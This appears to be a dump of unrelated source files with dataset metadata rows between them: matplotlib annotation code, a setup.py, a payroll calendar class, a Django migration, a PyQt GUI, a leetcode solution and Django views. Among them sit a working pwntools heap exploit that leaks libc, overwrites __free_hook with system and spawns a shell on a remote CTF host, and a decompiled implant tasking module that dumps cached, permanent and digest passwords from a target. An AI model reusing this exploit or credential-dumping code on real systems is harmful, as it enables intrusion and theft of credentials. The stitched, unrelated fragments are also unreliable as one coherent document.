def set_transform(self, t):
"""
Set the :class:`matplotlib.transforms.Transform` instance used
by this artist.
ACCEPTS: a :class:`matplotlib.transforms.Transform` instance
"""
Text.set_transform(self, t)
self.dashline.set_transform(t)
def get_figure(self):
'return the figure instance the artist belongs to'
return self.figure
def set_figure(self, fig):
"""
Set the figure instance the artist belong to.
ACCEPTS: a :class:`matplotlib.figure.Figure` instance
"""
Text.set_figure(self, fig)
self.dashline.set_figure(fig)
artist.kwdocd['TextWithDash'] = artist.kwdoc(TextWithDash)
class Annotation(Text):
"""
A :class:`~matplotlib.text.Text` class to make annotating things
in the figure, such as :class:`~matplotlib.figure.Figure`,
:class:`~matplotlib.axes.Axes`,
:class:`~matplotlib.patches.Rectangle`, etc., easier.
"""
def __str__(self):
return "Annotation({0:g},{1:g},{2!s})".format(self.xy[0], self.xy[1], repr(self._text))
def __init__(self, s, xy,
xytext=None,
xycoords='data',
textcoords=None,
arrowprops=None,
**kwargs):
"""
Annotate the *x*, *y* point *xy* with text *s* at *x*, *y*
location *xytext*. (If *xytext* = *None*, defaults to *xy*,
and if *textcoords* = *None*, defaults to *xycoords*).
*arrowprops*, if not *None*, is a dictionary of line properties
(see :class:`matplotlib.lines.Line2D`) for the arrow that connects
annotation to the point.
If the dictionary has a key *arrowstyle*, a FancyArrowPatch
instance is created with the given dictionary and is
drawn. Otherwise, a YAArrow patch instance is created and
drawn. Valid keys for YAArrow are
========= =============================================================
Key       Description
========= =============================================================
width     the width of the arrow in points
frac      the fraction of the arrow length occupied by the head
headwidth the width of the base of the arrow head in points
shrink    oftentimes it is convenient to have the arrowtip
          and base a bit away from the text and point being
          annotated. If *d* is the distance between the text and
          annotated point, shrink will shorten the arrow so the tip
          and base are shrink percent of the distance *d* away from the
          endpoints. ie, ``shrink=0.05 is 5%%``
?         any key for :class:`matplotlib.patches.Polygon`
========= =============================================================
Valid keys for FancyArrowPatch are
=============== ======================================================
Key             Description
=============== ======================================================
arrowstyle      the arrow style
connectionstyle the connection style
relpos          default is (0.5, 0.5)
patchA          default is bounding box of the text
patchB          default is None
shrinkA         default is 2 points
shrinkB         default is 2 points
mutation_scale  default is text size (in points)
mutation_aspect default is 1.
?               any key for :class:`matplotlib.patches.PathPatch`
=============== ======================================================
*xycoords* and *textcoords* are strings that indicate the
coordinates of *xy* and *xytext*.
================= ===================================================
Property          Description
================= ===================================================
'figure points'   points from the lower left corner of the figure
'figure pixels'   pixels from the lower left corner of the figure
'figure fraction' 0,0 is lower left of figure and 1,1 is upper right
'axes points'     points from lower left corner of axes
'axes pixels'     pixels from lower left corner of axes
'axes fraction'   0,0 is lower left of axes and 1,1 is upper right
'data'            use the coordinate system of the object being
                  annotated (default)
'offset points'   specify an offset (in points) from the *xy* value
'polar'           you can specify *theta*, *r* for the annotation,
                  even in cartesian plots. Note that if you
                  are using a polar axes, you do not need
                  to specify polar for the coordinate
                  system since that is the native "data" coordinate
                  system.
================= ===================================================
If a 'points' or 'pixels' option is specified, values will be
added to the bottom-left and if negative, values will be
subtracted from the top-right. Eg::
# 10 points to the right of the left border of the axes and
# 5 points below the top border
xy=(10,-5), xycoords='axes points'
Additional kwargs are Text properties:
%(Text)s
"""
if xytext is None:
xytext = xy
if textcoords is None:
textcoords = xycoords
# we'll draw ourself after the artist we annotate by default
x,y = self.xytext = xytext
Text.__init__(self, x, y, s, **kwargs)
self.xy = xy
self.xycoords = xycoords
self.textcoords = textcoords
self.arrowprops = arrowprops
self.arrow = None
if arrowprops and arrowprops.has_key("arrowstyle"):
self._arrow_relpos = arrowprops.pop("relpos", (0.5, 0.5))
self.arrow_patch = FancyArrowPatch((0, 0), (1,1),
**arrowprops)
else:
self.arrow_patch = None
__init__.__doc__ = cbook.dedent(__init__.__doc__) % artist.kwdocd
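# A minimal usage sketch (assumes an existing Axes instance ``ax``): an
# "arrowstyle" key selects the FancyArrowPatch branch, while keys such as
# width/frac/headwidth/shrink select the YAArrow branch:
#     ax.annotate('local max', xy=(3, 1), xytext=(4, 1.5), xycoords='data',
#                 arrowprops=dict(arrowstyle='->'))
#     ax.annotate('local max', xy=(3, 1), xytext=(4, 1.5), xycoords='data',
#                 arrowprops=dict(facecolor='black', shrink=0.05))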
def contains(self,event):
t,tinfo = Text.contains(self,event)
if self.arrow is not None:
a,ainfo=self.arrow.contains(event)
t = t or a
# self.arrow_patch is currently not checked as this can be a line - JJ
return t,tinfo
def set_figure(self, fig):
if self.arrow is not None:
self.arrow.set_figure(fig)
if self.arrow_patch is not None:
self.arrow_patch.set_figure(fig)
Artist.set_figure(self, fig)
def _get_xy(self, x, y, s):
if s=='data':
trans = self.axes.transData
x = float(self.convert_xunits(x))
y = float(self.convert_yunits(y))
return trans.transform_point((x, y))
elif s=='offset points':
# convert the data point
dx, dy = self.xy
# prevent recursion
if self.xycoords == 'offset points':
return self._get_xy(dx, dy, 'data')
dx, dy = self._get_xy(dx, dy, self.xycoords)
# convert the offset
dpi = self.figure.get_dpi()
x *= dpi/72.
y *= dpi/72.
# add the offset to the data point
x += dx
y += dy
return x, y
elif s=='polar':
theta, r = x, y
x = r*np.cos(theta)
y = r*np.sin(theta)
trans = self.axes.transData
return trans.transform_point((x,y))
elif s=='figure points':
#points from the lower left corner of the figure
dpi = self.figure.dpi
l,b,w,h = self.figure.bbox.bounds
r = l+w
t = b+h
x *= dpi/72.
y *= dpi/72.
if x<0:
x = r + x
if y<0:
y = t + y
return x,y
elif s=='figure pixels':
#pixels from the lower left corner of the figure
l,b,w,h = self.figure.bbox.bounds
r = l+w
t = b+h
if x<0:
x = r + x
if y<0:
y = t + y
return x, y
elif s=='figure fraction':
#(0,0) is lower left, (1,1) is upper right of figure
trans = self.figure.transFigure
return trans.transform_point((x,y))
elif s=='axes points':
#points from the lower left corner of the axes
dpi = self.figure.dpi
l,b,w,h = self.axes.bbox.bounds
r = l+w
t = b+h
if x<0:
x = r + x*dpi/72.
else:
x = l + x*dpi/72.
if y<0:
y = t + y*dpi/72.
else:
y = b + y*dpi/72.
return x, y
elif s=='axes pixels':
#pixels from the lower left corner of the axes
l,b,w,h = self.axes.bbox.bounds
r = l+w
t = b+h
if x<0:
x = r + x
else:
x = l + x
if y<0:
y = t + y
else:
y = b + y
return x, y
elif s=='axes fraction':
#(0,0) is lower left, (1,1) is upper right of axes
trans = self.axes.transAxes
return trans.transform_point((x, y))
def update_positions(self, renderer):
x, y = self.xytext
self._x, self._y = self._get_xy(x, y, self.textcoords)
x, y = self.xy
x, y = self._get_xy(x, y, self.xycoords)
ox0, oy0 = self._x, self._y
ox1, oy1 = x, y
if self.arrowprops:
x0, y0 = x, y
l,b,w,h = self.get_window_extent(renderer).bounds
r = l+w
t = b+h
xc = 0.5*(l+r)
yc = 0.5*(b+t)
d = self.arrowprops.copy()
# Use FancyArrowPatch if self.arrowprops has "arrowstyle" key.
# Otherwise, fallback to YAArrow.
#if d.has_key("arrowstyle"):
if self.arrow_patch:
# adjust the starting point of the arrow relative to
# the textbox.
# TODO : Rotation needs to be accounted.
relpos = self._arrow_relpos
bbox = self.get_window_extent(renderer)
ox0 = bbox.x0 + bbox.width * relpos[0]
oy0 = bbox.y0 + bbox.height * relpos[1]
# The arrow will be drawn from (ox0, oy0) to (ox1,
# oy1). It will be first clipped by patchA and patchB.
# Then it will be shrunk by shrinkA and shrinkB
# (in points). If patch A is not set, self.bbox_patch
# is used.
self.arrow_patch.set_positions((ox0, oy0), (ox1,oy1))
mutation_scale = d.pop("mutation_scale", self.get_size())
mutation_scale = renderer.points_to_pixels(mutation_scale)
self.arrow_patch.set_mutation_scale(mutation_scale)
if self._bbox_patch:
patchA = d.pop("patchA", self._bbox_patch)
self.arrow_patch.set_patchA(patchA)
else:
patchA = d.pop("patchA", self._bbox)
self.arrow_patch.set_patchA(patchA)
else:
# pick the x,y corner of the text bbox closest to point
# annotated
dsu = [(abs(val-x0), val) for val in l, r, xc]
dsu.sort()
_, x = dsu[0]
dsu = [(abs(val-y0), val) for val in b, t, yc]
dsu.sort()
_, y = dsu[0]
shrink = d.pop('shrink', 0.0)
theta = math.atan2(y-y0, x-x0)
r = math.sqrt((y-y0)**2. + (x-x0)**2.)
dx = shrink*r*math.cos(theta)
dy = shrink*r*math.sin(theta)
width = d.pop('width', 4)
headwidth = d.pop('headwidth', 12)
frac = d.pop('frac', 0.1)
self.arrow = YAArrow(self.figure, (x0+dx,y0+dy), (x-dx, y-dy),
width=width, headwidth=headwidth, frac=frac,
**d)
self.arrow.set_clip_box(self.get_clip_box())
def draw(self, renderer):
"""
Draw the :class:`Annotation` object to the given *renderer*.
"""
self.update_positions(renderer)
self.update_bbox_position_size(renderer)
if self.arrow is not None:
if self.arrow.figure is None and self.figure is not None:
self.arrow.figure = self.figure
self.arrow.draw(renderer)
if self.arrow_patch is not None:
if self.arrow_patch.figure is None and self.figure is not None:
self.arrow_patch.figure = self.figure
self.arrow_patch.draw(renderer)
Text.draw(self, renderer)
artist.kwdocd['Annotation'] = Annotation.__init__.__doc__
|
agpl-3.0
| -2,341,165,572,429,736,400
| 33.207279
| 209
| 0.548079
| false
| 4.069426
| false
| false
| false
|
kolypto/py-mailem
|
setup.py
|
1
|
1208
|
#!/usr/bin/env python
""" Slim, flexible, yet full-featured e-mailing library """
from setuptools import setup, find_packages
setup(
# http://pythonhosted.org/setuptools/setuptools.html
name='mailem',
version='0.0.5',
author='Mark Vartanyan',
author_email='kolypto@gmail.com',
url='https://github.com/kolypto/py-mailem',
license='BSD',
description=__doc__,
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
keywords=['e-mail', 'mail', 'template'],
packages=find_packages(),
scripts=[],
entry_points={},
install_requires=[
'future',
],
extras_require={
},
include_package_data=True,
test_suite='nose.collector',
platforms='any',
classifiers=[
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
bsd-2-clause
| -4,548,813,202,391,579,000
| 27.093023
| 71
| 0.620033
| false
| 3.922078
| false
| true
| false
|
maaruiz/Nominas2015ES
|
Funciones/Datos/calendario_dat.py
|
1
|
9946
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import calendar
import datetime
from Funciones.funs import ultimodiames, select_sql
from Funciones.Datos.contrato_dat import Contrato
from wstools.Utility import DOM
class Calendario:
"""
Performs the calculations of working days between two dates.
Two parameters must be passed:
desde -> list containing the initial year, month and day
desde = (anio, mes, dia)
hasta -> list containing the final year, month and day
hasta = (anio, mes, dia)
"""
def __init__(self, idcalendario, anio):
"""
Initializes the required variables:
primero = first day (datetime.date variable)
ultimo = last day (datetime.date variable)
desde list:
desdeanio = initial year (INT var.)
desdemes = initial month (INT var.)
desdedia = initial day (INT var.)
hasta list:
hastaanio = final year (INT var.)
hastames = final month (INT var.)
hastadia = final day (INT var.)
"""
self.calendario_id = idcalendario
self.anio = anio
self.desde(self.anio,1,1)
self.hasta(self.anio,12,31)
sql = ( "Select "
"A.idcalendario, A.descripcion, A.idmunicipio, "
"B.anio, B.mes, B.dia, B.idcal_festivo, "
"B.esfestivo_nnal, B.esfestivo_reg, B.esfestivo_loc, "
"B.esfestivo_convenio "
"From "
"calendario A "
"inner join "
"cal_festivos B "
"on A.idcalendario = B.idcalendario "
"Where "
"A.idcalendario = %s "
"and B.anio = %s;")
self.diasfestivos = select_sql((sql,(self.calendario_id, self.anio)),1)
self.totalanios = self.hastaanio - self.desdeanio
self.nolaboral()
def __call__(self, idcalendario, anio):
self.__init__(idcalendario, anio)
def desde(self, anio, mes, dia):
self.desdeanio = anio
self.desdemes = mes
self.desdedia = dia
self.primero = datetime.date(self.desdeanio, self.desdemes, self.desdedia)
return anio, mes, dia
def hasta(self, anio, mes, dia):
self.hastaanio = anio
self.hastames = mes
self.hastadia = dia
self.ultimo = datetime.date(self.hastaanio, self.hastames, self.hastadia)
return self.hastaanio, self.hastames, self.hastadia
def nolaboral(self):
"""
Counts the number of weekend days and holidays between the given dates
and returns the values (sab, dom, fes).
"""
sab = 0
dom = 0
fes = 0
for xanio in range(self.desdeanio, self.hastaanio + 1):
if xanio < self.hastaanio and xanio == self.desdeanio:
for xmes in range(self.desdemes, 12 + 1):
if xmes == self.desdemes:
sab = sab + self.diasemana_delmes(xanio, xmes, self.desdedia,
ultimodiames(xmes, xanio), 5)
dom = dom + self.diasemana_delmes(xanio, xmes, self.desdedia,
ultimodiames(xmes, xanio), 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio,
xmes, self.desdedia, self.hastadia)
else :
sab = sab + self.diasemana_delmes(xanio, xmes, 1,
ultimodiames(xmes, xanio), 5)
dom = dom + self.diasemana_delmes(xanio, xmes, 1,
ultimodiames(xmes, xanio), 6)
fes = fes + self.festivosdelmes(self.calendario_id,xanio, xmes, 1,
ultimodiames(xmes, xanio))
elif self.hastaanio > xanio > self.desdeanio:
for xmes in range(1,12+1):
sab = sab + self.diasemana_delmes(xanio, xmes,
1, ultimodiames(xmes, xanio), 5)
dom = dom + self.diasemana_delmes(xanio, xmes,
1, ultimodiames(xmes, xanio), 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio, xmes,
1, ultimodiames(xmes, xanio))
elif xanio == self.hastaanio and xanio > self.desdeanio:
for xmes in range(1, self.hastames + 1):
if xmes == self.hastames:
sab = sab + self.diasemana_delmes(xanio, xmes, 1, self.hastadia, 5)
dom = dom + self.diasemana_delmes(xanio, xmes, 1, self.hastadia, 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio,
xmes, 1, self.hastadia)
else:
sab = sab + self.diasemana_delmes(xanio, xmes, 1,
ultimodiames(xmes, xanio), 5)
dom = dom + self.diasemana_delmes(xanio, xmes, 1,
ultimodiames(xmes, xanio), 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio,
xmes, 1, ultimodiames(xmes, xanio))
elif xanio == self.hastaanio and xanio == self.desdeanio:
for xmes in range(self.desdemes, self.hastames + 1):
if xmes == self.desdemes and xmes < self.hastames:
sab = sab + self.diasemana_delmes(xanio, xmes, self.desdedia,
ultimodiames(xmes, xanio), 5)
dom = dom + self.diasemana_delmes(xanio, xmes, self.desdedia,
ultimodiames(xmes, xanio), 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio,
xmes, self.desdedia,
ultimodiames(xmes, xanio))
elif self.desdemes < xmes < self.hastames:
sab = sab + self.diasemana_delmes(xanio, xmes, 1,
ultimodiames(xmes, xanio), 5)
dom = dom + self.diasemana_delmes(xanio, xmes, 1,
ultimodiames(xmes, xanio), 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio, xmes,
1, ultimodiames(xmes, xanio))
elif xmes > self.desdemes and xmes == self.hastames:
sab = sab + self.diasemana_delmes(xanio, xmes, 1, self.hastadia, 5)
dom = dom + self.diasemana_delmes(xanio, xmes, 1, self.hastadia, 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio, xmes,
1, self.hastadia)
elif xmes == self.desdemes and xmes == self.hastames:
sab = sab + self.diasemana_delmes(xanio, xmes, self.desdedia,
self.hastadia, 5)
dom = dom + self.diasemana_delmes(xanio, xmes, self.desdedia,
self.hastadia, 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio, xmes, self.desdedia,
self.hastadia)
self.totaldomingos = dom
self.totalsabados = sab
self.totalfestivos = fes
self.diastotales = (self.ultimo - self.primero).days + 1
self.totalefectivos = self.diastotales - self.totalsabados - self.totaldomingos - self.totalfestivos
return sab,dom, fes
def festivosdelmes(self, calendario, anio, mes, desdedia, hastadia):
"""
Counts the number of holidays in a month, taking the given dates
into account.
The parameters must be of type INT:
Dias.festivosdelmes(calendario, anio, mes, desdedia, hastadia)
The holidays must be provided by an external calendar.
"""
sql = ( "Select "
"count(*) "
"From "
"cal_festivos "
"Where "
"idcalendario = %s "
"and anio = %s "
"and mes = %s "
"and dia >= %s "
"and dia <= %s "
"Group by "
"idcalendario;")
dato = 0
try:
dato = select_sql((sql, (calendario, anio, mes, desdedia, hastadia)))[0]
except:
pass
return dato
def diasemana_delmes(self, anio, mes, desdedia, hastadia, diasemana):
"""
Counts the occurrences of a given weekday between dates:
0 = Monday
1 = Tuesday
2 = Wednesday
3 = Thursday
4 = Friday
5 = Saturday
6 = Sunday
"""
calmes = calendar.Calendar().monthdays2calendar(anio, mes)
x = 0
for c in calmes:
if desdedia <= c[diasemana][0] <= hastadia:
x += 1
return x
def dias_entre_fechas(self):
contrato = Contrato()
dia_final = self.hasta(anio, mes, dia)
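# A minimal usage sketch (assumes a calendar with id 1 and its holidays exist
# in the database queried by select_sql):
#     cal = Calendario(1, 2015)
#     print(cal.totalsabados, cal.totaldomingos, cal.totalfestivos,
#           cal.totalefectivos)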
|
gpl-3.0
| -3,972,020,743,834,412,000
| 46.574163
| 108
| 0.476363
| false
| 3.465319
| false
| false
| false
|
qdqmedia/wiggum
|
wiggum/users/migrations/0011_auto_20151023_1228.py
|
1
|
1421
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import uuid
import django.utils.timezone
def gen_uuid(apps, schema_editor):
UserModel = apps.get_model('users', 'User')
for row in UserModel.objects.all():
row.sfa_token = uuid.uuid4()
row.save()
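# gen_uuid is the backfill step of the usual three-step recipe for adding a
# non-null unique column to existing rows: add the field as nullable, populate
# it with RunPython, then alter it to drop null=True.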
class Migration(migrations.Migration):
dependencies = [
('users', '0010_auto_wiggum_permission_data'),
]
operations = [
migrations.AddField(
model_name='user',
name='sfa_token',
field=models.UUIDField(null=True, editable=False, unique=True, verbose_name='SFA token'),
),
migrations.RunPython(gen_uuid, reverse_code=migrations.RunPython.noop),
migrations.AlterField(
model_name='user',
name='sfa_token',
field=models.UUIDField(editable=False, unique=True, verbose_name='SFA token'),
),
migrations.AddField(
model_name='user',
name='sfa_token_expire',
field=models.DateTimeField(verbose_name='SFA token expiration', default=django.utils.timezone.now),
),
migrations.AlterField(
model_name='user',
name='password_reset_token_expire',
field=models.DateTimeField(verbose_name='Password reset token expiration', default=django.utils.timezone.now),
),
]
|
bsd-3-clause
| 5,595,121,689,004,847,000
| 29.891304
| 122
| 0.613652
| false
| 4.036932
| false
| false
| false
|
fschimpf/graf2il
|
GUI/sekvens.py
|
1
|
1815
|
import sys
sys.path.append('../')
from PyQt4 import QtGui, QtCore
from sekvens_gui import Ui_MainWindow
import graf2il
class MeinProgramm(QtGui.QMainWindow, Ui_MainWindow):
def __init__(self):
QtGui.QWidget.__init__(self)
self.setupUi(self)
self.XMLFileToCompileName = 'test'  # store on the instance so start_graf2il() can use it before a file is chosen
# connect slots for GUI-elements
self.connect(self.pushButton_2, QtCore.SIGNAL('clicked (bool)'), self.start_graf2il)
self.connect(self.pushButton_3, QtCore.SIGNAL('clicked (bool)'), self.chooseInFile)
self.statusBar().showMessage('Malvik VGS - Fritz Schimpf')
def start_graf2il(self):
self.statusBar().showMessage('Script graf2il aktiv')
# start graf2il with correct setting for target language
if self.comboBox.currentIndex() == 0:
graf2il.main(self.XMLFileToCompileName,'awl')
elif self.comboBox.currentIndex() == 1:
graf2il.main(self.XMLFileToCompileName,'scl')
self.statusBar().showMessage('Malvik VGS - Fritz Schimpf')
def chooseInFile(self):
self.statusBar().showMessage('Velg inputfil')
self.XMLFileToCompileName = str(QtGui.QFileDialog.getOpenFileName(self, 'Velg fil som skal bli oversatt', '', 'JGrafchart XML-filer (*.xml);;alle filer (*.*)'))
self.lineEdit.setText(self.XMLFileToCompileName)
self.statusBar().showMessage('Malvik VGS - Fritz Schimpf')
app = QtGui.QApplication(sys.argv)
#locale = QtCore.QLocale.system().name()
locale = "nb_NO"
#locale = "de_DE"
#locale = "en_EN"
#print (locale)
translator = QtCore.QTranslator()
if translator.load("translation_" + locale, "./"):
app.installTranslator(translator)
programm = MeinProgramm()
programm.show()
sys.exit(app.exec_()) # infinite loop
|
gpl-3.0
| -6,599,197,859,360,954,000
| 34.588235
| 168
| 0.660606
| false
| 3.418079
| false
| false
| false
|
scwuaptx/CTF
|
2017-writeup/secuinside/bugsystem.py
|
1
|
1764
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
#host = "10.211.55.6"
#port = 8888
host = "13.112.128.199"
port = 1337
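# Rough outline, as read from the calls below: re-allocating a freed 0x80
# chunk and viewing its stale contents leaks a libc address; the constants
# that follow look like 32-bit libc offsets for what is assumed to be
# __free_hook and system(); an out-of-bounds edit then rewrites the hook so
# that deleting the bug holding "/bin/sh" ends up calling system("/bin/sh").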
for i in range(10):
r = remote(host,port)
def add(name,size,content):
r.recvuntil(":")
r.sendline("1")
r.recvuntil(":")
r.sendline(name)
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.send(content)
def edit(idx,types,value,data):
r.recvuntil(":")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))
r.recvuntil(":")
r.sendline(str(types))
r.recvuntil(":")
r.sendline(str(value))
r.recvuntil(":")
r.send(data)
def view():
r.recvuntil(":")
r.sendline("2")
def delbug(idx):
r.recvuntil(":")
r.sendline("4")
r.recvuntil(":")
r.sendline(str(idx))
add("dada",128,"nogg") #1
add("dada",128,"gogo") #2
delbug(1)
add("dada",32,"fuck") #3
view()
r.recvuntil("fuck")
data = r.recvuntil("\n")[:-1]
if len(data) < 4 :
r.close()
continue
libc = u32(data) - 0x1b07f0
print hex(libc)
add("da",32,"sh\x00") #4
add("da",32,"sh\x00") #5
delbug(0)
delbug(3)
delbug(4)
delbug(5)
add("ora",32,"lays")
view()
r.recvuntil("lays")
data = r.recvuntil("\n")[:-1]
if len(data) < 4 :
r.close()
continue
heap = u32(data) - 0x40
print hex(heap)
obj = heap + 0x178
free_hook = libc +0x1b18b0
system = libc + 0x3a940
off = free_hook - obj - 0x100000000
add("sh\x00",0x21000,"/bin/sh\x00")
edit(2,3,off,p32(system))
delbug(7)
r.interactive()
|
gpl-2.0
| -8,374,999,728,743,337,000
| 19.511628
| 39
| 0.494331
| false
| 2.94
| false
| false
| false
|
yelu/leetcode
|
DP/UniquePathsII.py
|
1
|
1063
|
class Solution:
# @param obstacleGrid, a list of lists of integers
# @return an integer
# [[0 for j in range(len(obstacleGrid[i]))]
# for i in range(len(obstacleGrid))]
# F[i][j] = F[i-1][j] + F[i][j-1]; F[i][j] = 0 if i < 0, j < 0, or the cell holds an obstacle
def uniquePathsWithObstacles(self, obstacleGrid):
res = [[0 for j in range(len(obstacleGrid[i]))]
for i in range(len(obstacleGrid))]
for i in range(len(obstacleGrid)) :
for j in range(len(obstacleGrid[i])) :
if not i and not j and not obstacleGrid[0][0]: res[0][0] = 1; continue
if not obstacleGrid[i][j] :
res[i][j] = (0 if i-1<0 else res[i-1][j])+\
(0 if j-1<0 else res[i][j-1])
# for i in range(len(obstacleGrid)) :
# for j in range(len(obstacleGrid[0])) :
# print res[i][j]
return res[len(obstacleGrid)-1][len(obstacleGrid[0])-1]
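# Worked example (matches the driver below): for a 3x3 grid with one obstacle
# in the centre, res fills in as
#     1 1 1
#     1 0 1
#     1 1 2
# so the method returns 2.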
ob = [
[0,0,0],
[0,1,0],
[0,0,0]
]
sol = Solution()
print sol.uniquePathsWithObstacles(ob)
|
gpl-2.0
| 2,702,322,879,902,214,700
| 36.964286
| 86
| 0.528692
| false
| 2.761039
| false
| false
| false
|
DarthMaulware/EquationGroupLeaks
|
Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Tasking/Mcl_Cmd_PasswordDump_Tasking.py
|
1
|
2486
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: Mcl_Cmd_PasswordDump_Tasking.py
CMD_PW_TYPE_ALL = 0
CMD_PW_TYPE_PERMANENT = 1
CMD_PW_TYPE_CACHED = 2
CMD_PW_TYPE_DIGEST = 3
def TaskingMain(namespace):
import mcl.imports
import mcl.target
import mcl.tasking
import mcl.tasking.technique
from mcl.object.Message import MarshalMessage
mcl.imports.ImportWithNamespace(namespace, 'mca.survey.cmd.passworddump', globals())
mcl.imports.ImportWithNamespace(namespace, 'mca.survey.cmd.passworddump.tasking', globals())
lpParams = mcl.tasking.GetParameters()
tgtParams = mca.survey.cmd.passworddump.Params()
tgtParams.threadProvider = mcl.tasking.technique.Lookup('PASSWORDDUMP', mcl.tasking.technique.TECHNIQUE_MCL_INJECT, lpParams['thread'])
tgtParams.memoryProvider = mcl.tasking.technique.Lookup('PASSWORDDUMP', mcl.tasking.technique.TECHNIQUE_MCL_MEMORY, lpParams['memory'])
if lpParams['type'] == CMD_PW_TYPE_ALL:
tgtParams.type = mca.survey.cmd.passworddump.PARAMS_TYPE_FLAGS_PERMANENT | mca.survey.cmd.passworddump.PARAMS_TYPE_FLAGS_CACHED
elif lpParams['type'] == CMD_PW_TYPE_PERMANENT:
tgtParams.type = mca.survey.cmd.passworddump.PARAMS_TYPE_FLAGS_PERMANENT
elif lpParams['type'] == CMD_PW_TYPE_CACHED:
tgtParams.type = mca.survey.cmd.passworddump.PARAMS_TYPE_FLAGS_CACHED
elif lpParams['type'] == CMD_PW_TYPE_DIGEST:
tgtParams.type = mca.survey.cmd.passworddump.PARAMS_TYPE_FLAGS_DIGEST
else:
mcl.tasking.OutputError('Invalid password type (%u)' % lpParams['type'])
return False
rpc = mca.survey.cmd.passworddump.tasking.RPC_INFO_DUMP
msg = MarshalMessage()
tgtParams.Marshal(msg)
rpc.SetData(msg.Serialize())
rpc.SetMessagingType('message')
taskXml = mcl.tasking.Tasking()
taskXml.AddProvider(mcl.tasking.technique.TECHNIQUE_MCL_MEMORY, tgtParams.memoryProvider)
taskXml.AddProvider(mcl.tasking.technique.TECHNIQUE_MCL_INJECT, tgtParams.threadProvider)
mcl.tasking.OutputXml(taskXml.GetXmlObject())
res = mcl.tasking.RpcPerformCall(rpc)
if res != mcl.target.CALL_SUCCEEDED:
mcl.tasking.RecordModuleError(res, 0, mca.survey.cmd.passworddump.errorStrings)
return False
return True
if __name__ == '__main__':
import sys
if TaskingMain(sys.argv[1]) != True:
sys.exit(-1)
|
unlicense
| -3,902,764,518,018,893,000
| 45.924528
| 139
| 0.723652
| false
| 2.959524
| false
| false
| false
|
orlenko/sfpirg
|
sfpirgapp/views/actiongroups.py
|
1
|
5045
|
from django.conf import settings
from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
from django.http.response import HttpResponseRedirect
from django.shortcuts import render_to_response, get_object_or_404
from django.template.context import RequestContext
from mezzanine.utils.email import send_mail_template
from sfpirgapp.forms import ActionGroupForm
from sfpirgapp.models import ActionGroup, Settings
import logging
from sfpirgapp.forms import ActionGroupRequestForm
from django.shortcuts import resolve_url
from django.contrib.auth.decorators import login_required
from sfpirgapp.templatetags.sfpirg_tags import _category_by_model
log = logging.getLogger(__name__)
def aglist(request):
aglist = ActionGroup.objects.all().order_by('title')
paginator = Paginator(aglist, 10)
page = request.GET.get('page')
try:
aglist = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
aglist = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
aglist = paginator.page(paginator.num_pages)
context = RequestContext(request, locals())
return render_to_response('sfpirg/aglist.html', {}, context_instance=context)
def actiongroup(request, slug):
actiongroup = get_object_or_404(ActionGroup, slug=slug)
page = actiongroup
current_item = page.title
form = None
if 'edit' in request.REQUEST:
form = ActionGroupForm(request.POST or None, request.FILES or None, instance=actiongroup)
if request.method == 'POST' and form.is_valid():
form.save()
return HttpResponseRedirect(actiongroup.get_absolute_url())
else:
if not (request.user.is_superuser or request.user == actiongroup.user):
return HttpResponseRedirect(actiongroup.get_absolute_url())
context = RequestContext(request, locals())
return render_to_response('pages/actiongroup.html', {}, context_instance=context)
def request_group(request):
try:
form = ActionGroupRequestForm(request.POST or None)
if request.method == 'POST' and form.is_valid():
form.save()
actiongroup = form.instance
send_mail_template('Action Group Application Submitted: %s' % actiongroup.title,
'sfpirg/email/ag_application',
Settings.get_setting('SERVER_EMAIL'),
actiongroup.contact_email,
context=locals(),
attachments=None,
fail_silently=settings.DEBUG,
addr_bcc=None)
send_mail_template('Action Group Application Submitted: %s' % actiongroup.title,
'sfpirg/email/ag_admin_application',
Settings.get_setting('SERVER_EMAIL'),
Settings.get_setting('ACTION_GROUPS_ADMIN_EMAIL'),
context=locals(),
attachments=None,
fail_silently=settings.DEBUG,
addr_bcc=None)
return HttpResponseRedirect(resolve_url('thankyou'))
current_item = 'Action Group Request'
context = RequestContext(request, locals())
return render_to_response('sfpirg/action_group_request.html', {}, context_instance=context)
except:
log.error('Failed to process request', exc_info=1)
@login_required
def create(request):
user = request.user
    # If this user already has an action group, redirect to its edit view instead of creating another.
for existing in ActionGroup.objects.filter(user=user):
return HttpResponseRedirect(existing.get_absolute_url() + '?edit=1')
initial = {'user': user, 'status': 1, '_order': 0}
cat = _category_by_model(ActionGroup)
initial['category'] = cat
form = ActionGroupForm(request.POST or None, request.FILES or None, initial=initial)
if request.method == 'POST' and form.is_valid():
form.save()
actiongroup = form.instance
send_mail_template('Action Group Application Submitted: %s' % actiongroup.title,
'sfpirg/email/ag_application',
Settings.get_setting('SERVER_EMAIL'),
user.email,
context=locals(),
attachments=None,
fail_silently=settings.DEBUG,
addr_bcc=None)
send_mail_template('Action Group Application Submitted: %s' % actiongroup.title,
'sfpirg/email/ag_admin_application',
Settings.get_setting('SERVER_EMAIL'),
Settings.get_setting('ACTION_GROUPS_ADMIN_EMAIL'),
context=locals(),
attachments=None,
fail_silently=settings.DEBUG,
addr_bcc=None)
